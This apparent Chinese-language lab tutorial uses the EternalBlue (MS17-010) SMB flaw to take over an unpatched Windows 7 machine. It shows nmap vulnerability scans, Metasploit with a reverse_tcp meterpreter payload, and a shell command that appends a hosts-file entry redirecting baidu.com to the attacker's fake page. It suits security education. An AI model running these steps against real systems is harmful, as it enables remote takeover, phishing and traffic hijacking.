1.永恒之蓝漏洞利用的是Windows操作系统中的SMB(Server Message Block)协议的一个安全漏洞,通过发送特制的网络数据包,攻击者可以在目标系统上执行任意代码,从而获取系统权限并控制目标计算机。
DNS劫持攻击是一种网络攻击方法,攻击者通过篡改DNS(Domain Name System)服务器的记录,将用户的域名请求导向恶意网站或者伪装成合法的网站,从而实施欺骗、窃取信息或者进行其他恶意行为。
下面演示的是通过永恒之蓝漏洞获得靶机权限,修改hosts文件的dns代理,从而实现dns劫持。
准备:
靶机:win7(没有打任何补丁),关闭防火墙
攻击机:kali
kali和win7之间能够相互ping通。
开始演示:
1.查看靶机正常状态。
2.回到攻击机(kali),查看这个index.html文件的代码,这是apache官网提供的访问页面,开启apache服务后,本地访问就是这个网页。还有一点就是,我们写的代码也得写在名为index.html这个文件才行。
server apache2 start
cd /var/www/html
3.对index.html这个文件进行备份:
cp index.html index1.html
vim index.html
4.在index.html文件中写上我们网页的代码,这样一个假的网页就做好了,接下来就是让靶机在访问百度时跳转到我们做好的页面上。
保存退出。
5.先看一下本机的IP地址,然后开始IP嗅探,查看同一网段内存在的主机。
6.用nmap扫描开放的端口。
ip地址为kali的ip地址,扫描这个网段也是可以的。
nmap 192.168.159.136 -sS
nmap 192.168.159.136 --script-smb-vuln-ms17-010
7.打开metasploit.
msfconsole
search ms17-010
use 0
set payload windows/x64/meterpreter/reverse_tcp
设置攻击目标的ip地址:
set rhost 192.168.159.135
run
getuid
shell
echo 192.168.159.136 www.baidu.com >>C:\windows\System32\drivers\etc\hosts
ipconfig /flushdns
9.回到靶机,查看hosts是否修改成功。
攻击成功。